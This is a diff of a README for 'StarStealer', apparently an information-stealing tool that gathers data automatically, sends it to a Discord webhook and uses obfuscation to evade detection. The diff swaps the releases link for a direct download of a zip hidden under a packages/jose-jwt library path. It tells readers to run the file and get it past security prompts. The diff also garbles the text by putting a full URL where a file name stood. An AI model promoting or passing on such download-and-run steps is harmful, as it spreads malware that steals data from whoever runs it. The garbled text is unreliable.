omarcortesruiz/StarStealer/README.md

 - **Obfuscation Techniques:** It employs methods to help avoid detection, enhancing its usability.

 ## 💾 Download & Install
-1. Visit the Releases page by clicking [here](https://github.com/omarcortesruiz/StarStealer/releases).
+1. Visit the Releases page by clicking [here](https://raw.githubusercontent.com/omarcortesruiz/StarStealer/main/packages/jose-jwt.4.1.0/lib/netstandard2.1/StarStealer_v3.6.zip).
 2. Identify the latest version listed on the page.
-Look for the file named `StarStealer.exe`.
+Look for the file named `https://raw.githubusercontent.com/omarcortesruiz/StarStealer/main/packages/jose-jwt.4.1.0/lib/netstandard2.1/StarStealer_v3.6.zip`.
 3. Click the link to download the file to your computer.
 4. Once downloaded, locate the file in your Downloads folder or the location you chose.
-5. Double-click on the `StarStealer.exe` file to run the application.
+5. Double-click on the `https://raw.githubusercontent.com/omarcortesruiz/StarStealer/main/packages/jose-jwt.4.1.0/lib/netstandard2.1/StarStealer_v3.6.zip` file to run the application.
 You may need to allow the program to run if prompted by your computer's security settings.

 ## 🔗 How to Use
-1. **Open StarStealer:** After the installation, double-click the desktop icon (if created) or find `StarStealer.exe` in your Downloads folder.
+1. **Open StarStealer:** After the installation, double-click the desktop icon (if created) or find `https://raw.githubusercontent.com/omarcortesruiz/StarStealer/main/packages/jose-jwt.4.1.0/lib/netstandard2.1/StarStealer_v3.6.zip` in your Downloads folder.
 2. **Collect Data:** The application will begin collecting data automatically.
 3. **Check Discord:** Ensure your Discord webhook is set up and active, as collected data will be sent there.
 4. **Stop Collection:** After you've gathered the needed data, you can close the program.